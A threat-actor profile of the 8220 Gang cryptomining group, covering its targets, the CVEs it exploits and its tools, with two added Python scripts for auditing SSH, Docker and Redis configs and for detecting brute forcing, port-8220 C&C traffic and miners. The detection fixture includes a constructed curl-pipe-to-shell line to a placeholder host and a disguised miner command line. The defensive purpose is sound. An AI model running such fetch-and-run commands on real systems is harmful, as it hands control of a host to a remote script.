8220 Gang (Returned Libra) – Threat Actor

February 26, 2024
8220 Gang

Other Names

8220 Mining Group, Returned Libra

Location

China

Date of initial activity

2017

Suspected attribution

Believed to have originated from a GitHub fork of the Rocke group's tooling

Motivation

Financial Gain

Associated tools

Tsunami malware, XMRig cryptominer (customised as PwnRig and DBUsed), masscan, spirit, PureCrypter MaaS

Overview

The 8220 Gang, also tracked as Returned Libra or the 8220 Mining Group, is a cloud-focused threat actor that has been active since at least 2017. The name derives from the group's use of port 8220 for command-and-control (C&C) communications. Its operations rely on PwnRig and DBUsed, customised variants of the open-source XMRig Monero miner. The group is believed to have originated from a GitHub fork of the Rocke group's software, and it has since expanded its mining operations by scraping cloud service platform credentials from compromised hosts.

Common targets

Victims of 8220 Gang are typically, but not exclusively, users of cloud networks (AWS, Azure, GCP, Aliyun, QCloud) running vulnerable or misconfigured Linux applications and services. Victims are not selected geographically; they are simply identified by their internet accessibility. The group is opportunistic in its targeting, with no clear trend in country or industry.

Attack Vectors

The group infects cloud hosts through two vectors: exploitation of known vulnerabilities in internet-facing applications, and brute forcing of remote-access services such as SSH.
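Both vectors depend on host configuration that a defender can audit before the scanners arrive. The script below is an added example, not code from this page or from the group: it checks constructed sshd_config, Docker daemon.json and redis.conf snippets (all invented for illustration) for the settings that make SSH password brute forcing, an unauthenticated Docker daemon API and an unauthenticated Redis possible, and shows a hardened version beside each weak one. Reading "misconfigured Docker" as a plain-TCP daemon API and "Redis" as an unauthenticated, internet-bound instance is this editor's assumption; the page itself names no specific settings.

```python
"""Audit the exposure classes 8220 Gang uses for initial access: SSH open to
password brute forcing, a Docker daemon API on plain TCP and an unauthenticated
Redis. Added example; every config string below is constructed."""
import json

# Constructed weak and hardened configs (not taken from any real host).
SSHD_WEAK = """
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""
SSHD_HARDENED = """
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
"""
DOCKER_WEAK = json.dumps({"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]})
DOCKER_HARDENED = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True, "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem",
})
REDIS_WEAK = """
bind 0.0.0.0
protected-mode no
# requirepass deliberately absent
"""
REDIS_HARDENED = """
bind 127.0.0.1 -::1
protected-mode yes
requirepass ReplaceWithALongRandomSecret
rename-command CONFIG ""
"""


def _kv(text, first_wins):
    """Parse 'keyword value' lines, dropping comments. sshd_config keeps the first
    occurrence of a keyword, redis.conf the last; Match blocks are not handled."""
    opts = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        key = key.lower()
        if first_wins and key in opts:
            continue
        opts[key] = value.strip()
    return opts


def audit_sshd(text):
    """Flag settings that leave SSH brute-forceable (defaults per OpenSSH)."""
    o = _kv(text, first_wins=True)
    findings = []
    if o.get("passwordauthentication", "yes") == "yes":
        findings.append("sshd: password logins allowed; set PasswordAuthentication no and use keys")
    if o.get("permitrootlogin", "prohibit-password") == "yes":
        findings.append("sshd: root password login allowed; set PermitRootLogin no")
    return findings


def audit_docker(daemon_json):
    """Flag a daemon API reachable over TCP without TLS client verification."""
    cfg = json.loads(daemon_json)
    tcp = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    tls = cfg.get("tlsverify") and all(cfg.get(k) for k in ("tlscacert", "tlscert", "tlskey"))
    if tcp and not tls:
        return [f"docker: API on {', '.join(tcp)} without TLS client auth; "
                "drop the tcp host or set tlsverify with CA, cert and key"]
    return []


def audit_redis(text):
    """Flag a Redis that any internet scanner can talk to without a password."""
    o = _kv(text, first_wins=False)
    findings = []
    bind = o.get("bind", "0.0.0.0")  # no bind directive means every interface
    if "0.0.0.0" in bind or "*" in bind:
        findings.append("redis: bound to all interfaces; bind 127.0.0.1 or a private address")
    if o.get("protected-mode", "yes") == "no":
        findings.append("redis: protected-mode off; set protected-mode yes")
    if "requirepass" not in o:
        findings.append("redis: no password; set requirepass (or ACLs)")
    return findings


def audit(sshd, docker_json, redis):
    """Run all three checks and return the combined list of findings."""
    return audit_sshd(sshd) + audit_docker(docker_json) + audit_redis(redis)


if __name__ == "__main__":
    for finding in audit(SSHD_WEAK, DOCKER_WEAK, REDIS_WEAK):
        print(finding)
    print("hardened:", audit(SSHD_HARDENED, DOCKER_HARDENED, REDIS_HARDENED))
```

The weak set yields six findings and the hardened set none. A hardened `daemon.json` that still exposes TCP/2376 is acceptable only with `tlsverify`; the simpler fix for most hosts is to drop the `tcp://` entry entirely and keep the Unix socket.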

How they operate

The 8220 Gang is an active threat group known for scanning and exploiting vulnerabilities in cloud and container environments. It specifically targets applications such as Oracle WebLogic, Apache Log4j, Atlassian Confluence and misconfigured Docker containers, with the objective of deploying cryptocurrency mining software on the compromised systems. To carry out its attacks the gang uses tools including the Tsunami malware, the XMRig cryptominer, masscan and spirit, which help it identify and exploit weaknesses in the targeted applications. After an initial infection, the attacks use SSH brute forcing to automate both local and internet-wide spreading attempts. Victims using cloud infrastructure (AWS, Azure, GCP, Aliyun, QCloud) are often infected via publicly accessible hosts running Docker, Confluence, Oracle WebLogic and Redis.

On Windows targets the attack payload includes a PowerShell script responsible for downloading and creating the additional files needed for the attack. Alongside its recently disclosed use of CVE-2021-44228 (Log4Shell) and CVE-2017-3506 (an older Oracle WebLogic remote code execution flaw), the group has attempted exploitation of CVE-2020-14883, a remote code execution vulnerability in Oracle WebLogic Server, to propagate its malware. Despite its age, this vulnerability still exists in some systems, which keeps it a valuable target for the gang.

The ultimate goal is to install and execute a cryptocurrency miner on the compromised systems. On Windows this is achieved by injecting an encrypted resource file into the MSBuild process and communicating with the group's command-and-control (C&C) servers, which provide instructions and deliver the files needed for the mining operation.

References
  • Connecting the dots between recently active cryptominers
  • 8220 Gang Deploys a New Campaign with Upgraded Techniques
  • From the Front Lines | 8220 Gang Massively Expands Cloud Botnet to 30,000 Infected Hosts
  • 8220 Gang Cloud Botnet Targets Misconfigured Cloud Workloads
  • Old Cyber Gang Uses New Crypter – ScrubCrypt
  • 8220 Gang Exploiting Vulnerabilities in Cloud Environments for Cryptocurrency Mining
  • 8220 Gang Evolves With New Strategies
  • Imperva Detects Undocumented 8220 Gang Activities
  • 8220 Gang Cryptomining Campaign Targets Linux & Windows Platforms
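The behaviours described under How they operate (post-infection SSH brute forcing, C&C on port 8220, and XMRig-derived miners such as PwnRig and DBUsed) translate into three simple detections that can be run over host and network logs. The script below is an added example, not the page's or the group's code. The sshd log lines, connection records and process listing are constructed; their formats (RFC 3339 syslog timestamps, a CSV connection export, `ps -eo pid,comm,args` output) are assumptions, and every hostname, address, pool name and process name is invented.

```python
"""Detection logic for 8220 Gang tradecraft: SSH password brute forcing,
outbound C&C on TCP/8220 and XMRig-family miners. Added example; all log
lines below are constructed, not captured from a real incident."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines in RFC 3339 syslog style (assumed log format).
AUTH_LOG = """\
2024-02-26T10:00:01 web1 sshd[4012]: Failed password for root from 203.0.113.5 port 51234 ssh2
2024-02-26T10:00:03 web1 sshd[4013]: Failed password for invalid user admin from 203.0.113.5 port 51236 ssh2
2024-02-26T10:00:05 web1 sshd[4014]: Failed password for root from 203.0.113.5 port 51240 ssh2
2024-02-26T10:00:08 web1 sshd[4015]: Failed password for root from 203.0.113.5 port 51244 ssh2
2024-02-26T10:00:09 web1 sshd[4016]: Failed password for oracle from 203.0.113.5 port 51250 ssh2
2024-02-26T10:00:12 web1 sshd[4017]: Accepted publickey for deploy from 198.51.100.7 port 40000 ssh2
2024-02-26T11:30:00 web1 sshd[4100]: Failed password for alice from 198.51.100.7 port 40010 ssh2
"""

# Constructed connection records "src_ip,dst_ip,dst_port,proto" (assumed export format).
CONN_LOG = """\
10.0.2.15,203.0.113.44,8220,tcp
10.0.2.15,198.51.100.20,443,tcp
10.0.2.16,203.0.113.44,8220,tcp
10.0.2.15,10.0.2.1,53,udp
"""

# Constructed `ps -eo pid,comm,args` output; the miner is renamed to look like a kernel thread.
PS_OUTPUT = """\
  PID COMMAND         COMMAND
    1 systemd         /sbin/init
 2231 java            /usr/bin/java -jar weblogic.jar
 3411 kworkerds       /tmp/.x/kworkerds -o stratum+tcp://pool.example:3333 -u WALLET --donate-level=0
 3420 bash            bash -c curl -s http://example.invalid/x.sh | sh
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)
# Names from the page (xmrig, pwnrig, dbused) plus XMRig command-line markers that survive a rename.
MINER_RE = re.compile(r"xmrig|pwnrig|dbused|stratum\+tcp://|--donate-level", re.I)


def ssh_bruteforce_sources(log, threshold=5, window=timedelta(seconds=60)):
    """Return {src_ip: peak_failures} for sources with >= threshold failures in any window."""
    per_ip = defaultdict(list)
    for line in log.splitlines():
        m = FAILED_RE.match(line)
        if m:
            per_ip[m["ip"]].append(datetime.fromisoformat(m["ts"]))
    hits = {}
    for ip, times in per_ip.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            hits[ip] = peak
    return hits


def c2_port_connections(log, c2_port=8220):
    """Return sorted (src, dst) pairs that opened TCP to the group's known C&C port."""
    pairs = set()
    for line in log.splitlines():
        src, dst, dport, proto = line.split(",")
        if proto == "tcp" and int(dport) == c2_port:
            pairs.add((src, dst))
    return sorted(pairs)


def miner_processes(ps_text):
    """Return PIDs whose command line looks like an XMRig-family miner."""
    pids = []
    for line in ps_text.splitlines()[1:]:  # skip the ps header
        parts = line.split(None, 2)
        if len(parts) == 3 and MINER_RE.search(parts[2]):
            pids.append(int(parts[0]))
    return pids


def triage():
    """Run all three detections over the constructed samples."""
    return {
        "ssh_bruteforce": ssh_bruteforce_sources(AUTH_LOG),
        "c2_port": c2_port_connections(CONN_LOG),
        "miners": miner_processes(PS_OUTPUT),
    }


if __name__ == "__main__":
    for name, result in triage().items():
        print(name, result)
```

A hit on port 8220 alone is a lead rather than proof, since the port is not reserved for the group; correlate it with the SSH burst and the miner process, and tune `threshold` and `window` to the host's normal login-failure rate. Matching on `stratum+tcp://` and `--donate-level` rather than on the binary name is what catches the renamed miner in the sample.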
 
Tags: 8220 Gang, Attackers, China, Cryptomining, Returned Libra, Threat Actors
    © 2025 | CyberMaterial | All rights reserved